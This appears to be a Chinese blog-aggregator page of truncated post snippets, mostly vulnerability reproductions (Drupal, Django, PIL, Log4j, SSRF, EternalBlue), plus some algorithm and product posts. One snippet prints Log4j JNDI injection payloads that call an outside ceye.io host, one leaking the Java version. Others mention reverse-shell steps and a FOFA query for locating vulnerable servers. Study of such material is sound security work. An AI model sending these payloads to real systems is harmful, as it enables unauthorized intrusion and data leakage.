漏洞netatalk思路2018
CVE-2018-8120 漏洞复现
CVE-2018-8120 漏洞复现 漏洞描述 win32k.sys中函数 SetImeInfoEx未对指针进行合法性检查,从而导致一个任意地址写。 漏洞分析 漏洞成因 int __stdcall SetImeInfoEx(int ProcessWindowStation, _DWORD *user ......
《Web安全基础》06. 逻辑漏洞&越权
@目录1:逻辑漏洞2:逻辑越权3:修复防御方案4:越权问题4.1:商品购买4.2:找回重置机制4.3:接口安全问题4.4:验证安全5:相关资源 本系列侧重方法论,各工具只是实现目标的载体。 命令与工具只做简单介绍,其使用另见《安全工具录》。 靶场参考:pikachu。 1:逻辑漏洞 逻辑漏洞,与技术 ......
积木报表 JimuReport v1.6.2-GA3版本发布—高危SQL漏洞安全加固版本
项目介绍 一款免费的数据可视化报表,含报表和大屏设计,像搭建积木一样在线设计报表!功能涵盖,数据报表、打印设计、图表报表、大屏设计等! Web 版报表设计器,类似于excel操作风格,通过拖拽完成报表设计。 秉承“简单、易用、专业”的产品理念,极大的降低报表开发难度、缩短开发周期、节省成本、解决各类 ......
这家电商公司因系统漏洞损失100万!只因没做好这件事……
传统电商品牌 “绑住” 用户的方式,局限于折扣。同质化的“低价策略”让品牌们逐渐丢失了营销竞争力,用户增长疲软。由此,社交电商营销模式应运而生,品牌们可利用社交电商营销系统,解决用户拉新、裂变和沉浸的问题。 但同时,该模式的应用,也为品牌带来了软件安全危机—— 近日,某网络电商公司称:公司营销系统中 ......
代码审计常见漏洞与危险函数
程序命名规范 持久层:dao、persist、mapper 实体类:entity、model、bean、javabean、pojo 业务逻辑:service、biz 控制器:controller、servlet、action、web 过滤器:filter 异常:exception 监听器:liste ......
思路错点与 tricks 的一个总结
感觉自己变弱了,想卷,但是显然是完全卷不起来的。所以考虑写博客,当作一种软颓废(不想打题,而是写博客寻找自信)。 动态规划 暑假写的。StaroForgin 老师讲得很好啊,非常有启发意义。我感觉之前做的都不算动态规划。但是现在做的还不多,于是没有办法写具体的题解。 费用提前计算。我们只要改变定义, ......
Python unpickle 造成任意命令执行漏洞
目录1.1、漏洞描述1.2、漏洞等级1.3、影响版本1.4、漏洞复现1、基础环境3、漏洞验证 说明 内容 漏洞编号 漏洞名称 Python unpickle 造成任意命令执行漏洞 漏洞评级 影响范围 漏洞描述 修复方案 1.1、漏洞描述 序列化 把对象(变量)从内存中变成可存储或传输的过程称为序列化 ......
Drupal < 7.32版本 _“Drupalgeddon” SQL注入漏洞(CVE-2014-3704)
目录1.1、漏洞描述1.2、漏洞等级1.3、影响版本1.4、漏洞复现1、基础环境2、漏洞扫描3、漏洞验证 说明 内容 漏洞编号 CVE-2014-3704 漏洞名称 Drupal “Drupalgeddon” SQL注入漏洞 漏洞评级 影响范围 Drupal 7.0~7.31版本 漏洞描述 修复方案 ......
Python PIL 远程命令执行漏洞(via Ghostscript)
目录1.1、漏洞描述1.2、漏洞等级1.3、影响版本1.4、漏洞复现1、基础环境2、漏洞分析3、漏洞验证1.5、深度利用1、反弹Shell 说明 内容 漏洞编号 PIL-CVE-2018-16509 漏洞名称 Python PIL 远程命令执行漏洞 漏洞评级 影响范围 漏洞描述 修复方案 1.1、漏 ......
排列中的数值问题(改编自NOIP2018程序填空第2大题)
题目描述 对于一个 \(1\) 到 \(n\) 的排列 \(p_1, p_2, \ldots, p_n\)(即 \(1\) 到 \(n\) 中每一个数在数列 \(p\) 中出现了恰好一次),令 \(q_i\) 为第 \(i\) 个位置之后第一个比 \(p_i\) 值更大的位置,如果不存在这样的位置, ......
Python PIL 远程命令执行漏洞(GhostButt )
目录1.1、漏洞描述1.2、漏洞等级1.3、影响版本1.4、漏洞复现1、基础环境2、漏洞扫描3、漏洞验证1.5、深度利用1、反弹Shell 说明 内容 漏洞编号 PIL-CVE-2017-8291 漏洞名称 PIL 远程命令执行漏洞 漏洞评级 影响范围 漏洞描述 修复方案 1.1、漏洞描述 PIL ......
Django_debug page_XSS漏洞(CVE-2017-12794)漏洞复现
目录1.1、漏洞描述1.2、漏洞等级1.3、影响版本1.4、漏洞复现1、基础环境2、漏洞分析3、漏洞验证 说明 内容 漏洞编号 CVE-2017-12794 漏洞名称 Django_debug page_XSS漏洞 漏洞评级 影响范围 1.11.5版本 漏洞描述 修复方案 1.1、漏洞描述 1.11 ......
最简单的前端分页---思路就是监听分页变化,然后slice数据源
element版本的 背景 有些页面显示数据量不大,或者后端分页比较复杂;不考虑性能情况下前端分页不失为比较好的选择。 实现 技术点:VUE + Element (el-table , el-pagination) DEMO <template> <div class="app-container" ......
永恒之蓝漏洞复现
Metasploit Framework(简称MSF)是一款强大的开源渗透测试工具,具有多种功能和用途。它的主要作用包括: 渗透测试:Metasploit Framework允许安全专业人员模拟黑客攻击,以发现和利用系统和应用程序中的漏洞。这有助于组织识别并修复潜在的安全问题,提高系统的安全性。 漏 ......
华为云发布CodeArts Inspector漏洞管理服务,守护产品研发安全
本文分享自华为云社区《华为云发布CodeArts Inspector漏洞管理服务,守护产品研发安全》,作者: 华为云头条。 2023年9月7日,华为云正式发布CodeArts Inspector漏洞管理服务。这是一款面向软件研发和服务运维提供的一站式漏洞管理能力,通过持续评估系统和应用等资产,内置风 ......
Web攻防--JNDI注入--Log4j漏洞--Fastjson反序列化漏洞
JNDI注入 什么是JNDI JNDI全称为 Java Naming and Directory Interface(Java命名和目录接口),是一组应用程序接口,为开发人员查找和访问各种资源提供了统一的通用接口,可以用来定义用户、网络、机器、对象和服务等各种资源。 JNDI支持的服务主要有:DNS ......
Net6 注入思路
依赖注入 先添加要注册的对象 如 AddTransient<IA,A>()到 ServiceCollection ;然后将添加的 对象 添加到到 容器里,这里根据 添加 对象的不同,如 .AddScoped<IB>(_ => new B()),AddSingleton<IC>(new C());等然 ......
2018-2019 9th BSUIR Open Programming Championship
I. Equal Mod Segments \(1 \leq n \leq 1e5\) \(1 \leq a_i \leq 3e5\) 题解:ST表 + 扫描线 + 二维偏序 取模存在一个不错的性质:\(x \%p\)要么\(x\)不变,要么\(x\)至少整除\(2\) 所以我们考虑固定左端点\(l ......
CVE-2017-6920漏洞复现
前言 本文所述远程代码执行漏洞由Drupal Core的YAML解析器处理不当所导致。漏洞对应的CVE编号为CVE-2017-6920。 8.x版本&&小于8.3.4版本 漏洞环境(基于ubuntu18.04) 故事的开始: 启动漏洞环境(vulhub靶场,在cve-2017-6920文件夹中启do ......
极验验证码破解思路
1.背景 最近整理以前的文件,发了一篇有意思的关于极验验证码破解思路的文章。现在回过头来思考感觉挺有意思的,分享给大家。 百度百科对极验的定义如下: 极验验证是一种在计算机领域用于区分自然人和机器人的,通过简单集成的方式,为开发者提供安全、便捷的云端验证服务。与以往传统验证码不同的是,极验通过分析用 ......
sql注入漏洞
1.0 什么是sql注入 sql注入第一次是在1998年著名黑客杂志phack第54期上提出的 sql注入是服务器端未严格校验客户端发送的数据,导致服务器端sql语句被恶意修改并成功执行 的行为 1.1 sql的分类 sql注入按请求方法分为get型和post型。 按照sq;数据类型分类可分为整型注 ......
LOJ#6515. 「雅礼集训 2018 Day10」贪玩蓝月题解
题目链接 #6515. 「雅礼集训 2018 Day10」贪玩蓝月 - 题目 - LibreOJ (loj.ac) 分析 一个朴素的想法就是模拟这个过程,当询问时做一遍01背包,但这样明显会超时 想象这样一个例子:当两次询问中间夹着一次插入操作 第二次进行01背包,明显只需要在第一次的基础上对新插入 ......
SSRF漏洞拓展
# SSRF漏洞拓展 [TOC] ## curl_exec函数 ### 一、ssrf配合gopher协议反弹shell 实验环境: ``` (1)192.168.142.201 #redis服务器 (2)192.168.142.133 #攻击机 (3)192.168.142.1 #SSRF靶机 `` ......
JAVA的几个知名的反序列化漏洞
更新一下笔记中JAVA的几个知名的反序列化漏洞,仅漏洞poc和原理,无分析过程。 # Log4j 条件:出网(因为需要请求jndi服务器) ``` ${jndi:ldap://yuvs2b.ceye.io} //外带请求 ${jndi:ldap://${java:version}.f2478a5a. ......
IIS_7.o/7.5解析漏洞
[toc] # IIS_7.o/7.5解析漏洞 | 说明 | 内容 | | | | | 漏洞编号 | | | 漏洞名称 | IIS_7.o/7.5解析漏洞 | | 漏洞评级 | | | 影响范围 | win7,server2008 | | 漏洞描述 | | | 修复方案 | | ### 1.1、漏洞 ......
CTF文件与图片杂项思路
文件操作与隐写 ·文件类型识别 一、文件没有后缀名或有后缀名也无法打开(不知道文件类型) 解题思路: 1、采用kali中有的file命令(格式为:file 文件名) 2、用winhex(一款16进制编辑器)打开文件查看文件头进行比对 常见文件头类型:常用文件的文件头(十六进制)_PolluxAven ......
用友时空KSOA ImageUpload文件上传漏洞
## 漏洞简介 用友时空KSOA平台ImageUpload处存在任意文件上传漏洞,攻击者通过漏洞可以获取服务器权限 ## 影响版本 用友时空企业信息融通平台KSOA v9.0 ## 漏洞复现 fofa语法:`app="用友-时空KSOA"` 登录页面如下: ![](https://img2023.c ......
【Python 自动化】小说推文一键生成思路概述
最近看了一下小说推文成品软件的思路,发现可以完全迁移到我的 [BookerAutoVideo](https://github.com/dracounion/BookerAutoVideo) 上面来。这篇短文里面,我试着分析一下整个推文视频生成的流程,以及简要阐述一下有什么工具。 整体流程是这样: ! ......
Acunetix v23.8 发布 - 漏洞扫描 (Web 应用程序安全测试)
Acunetix v23.8 (Linux, Windows) - 漏洞扫描 (Web 应用程序安全测试) Acunetix | Web Application Security Scanner 请访问原文链接:,查看最新版。原创作品,转载请保留出处。 作者主页:[sysin.org](https: ......